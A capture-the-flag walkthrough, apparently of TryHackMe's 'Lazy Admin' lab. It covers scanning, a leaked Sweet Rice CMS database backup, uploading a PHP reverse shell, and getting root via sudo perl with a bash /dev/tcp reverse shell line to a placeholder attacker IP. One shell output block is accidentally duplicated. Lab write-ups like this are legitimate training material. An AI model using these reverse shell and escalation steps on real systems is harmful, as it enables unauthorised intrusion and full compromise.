Lazy Admin

Room Covers:

  • Service Discovery

  • Finding Vulnerabilities

  • Exploitation

  • Privilege Escalation

Target Details

  • IP: 10.10.209.190

Service Discovery

  • Using nmap

    nmap -sV -sC -Pn -oN nmap.txt 10.10.209.190

  • Services Discovered

    ServicePortVersion

    SSH

    22

    OpenSSH 7.2p2

    HTTP

    80

    Apache httpd 2.4.18

  • Finding Directories on HTTP server using GoBuster

    gobuster dir -u http://10.10.209.190/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -t 40 --no-error -o web-dirs.txt

    Directories Discovered: /content

  • On visiting /content page, the server's using Basic CMS with Sweet Rice installed

Finding Vulnerabilities

  • From 1st vulnerability, after visting /content/inc/mysql_backup/ link we get SQL database file, from where we get username and password hash, which can be easily cracked online using various tools such as crackstation

    usernamepassword hashpassword

    manager

    42f749ade7f9e195bf475f37a44cafcb

    Passwordxxx

    we don't know login page yet!

  • Moving to parent directory /content/inc/, we get access to all the files , from where we get Sweet Rice version /content/inc/lastest.txt which is 1.5.1

  • On Searching for Sweet Rice 1.5.1 vulnerabilities on Search Engine, it leads to File Upload

  • On reading the exploit, we get the admin page link as /as but admin page is different which is /content/as

  • Visit /content/as with the admin credentials above

  • We can add custom php code from ADS tab

  • TL;DR;

    ServiceVulnerability

    Sweet Rice

    Backup Disclosure

    Sweet Rice 1.5.1

    File Upload

Exploitation

  • Create an evil reverse shell adversitement

  • Using PentestMonkey php reverse shell template, we can get access to shell, by chaning ip variable to our attacker's vpn ip, and then upload

  • Start listener using netcat

    nc -nlvp 1234

  • From content/inc/ads/ we can execute the uploaded reverse shell

  • We have access to the shell

    listening on [any] 1234 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 40312
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 11:43:09 up  1:26,  0 users,  load average: 0.83, 0.30, 0.10
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

    We can run perl and /home/itguy/backup.pl as root

Privilege Escalation

  • Finding Escalation Vectors

    listening on [any] 1234 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 40312
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 11:43:09 up  1:26,  0 users,  load average: 0.83, 0.30, 0.10
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

    We can run perl and /home/itguy/backup.pl as root

  • Victim's shell

    # overwrite contents of copy.sh with reverse shell on port
echo "/bin/bash -c 'exec bash -i &>/dev/tcp/[ATTACKER_VPN_IP]/4444 <&1'" > /etc/copy.sh

# on attacker's machine start netcat listener session on port 4444
# nc -nlvp 4444

# execute reverse shell with sudo rights
sudo /usr/bin/perl /home/itguy/backup.pl

  • Root Shell on Attacker's machine

    nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 52812
bash: cannot set terminal process group (1058): Inappropriate ioctl for device
bash: no job control in this shell
root@THM-Chal:/#

Get Flags

  • User Flag

    cat /home/itguy/user.txt
# THM{63e5bce9271952xxxxxxxxxxxxxxxxxx}

  • Root Flag

    cat /root/root.txt
# THM{6637f41d0177bxxxxxxxxxxxxxxxxxxx}
PreviousBounty HackerNextCrack The Hash

Last updated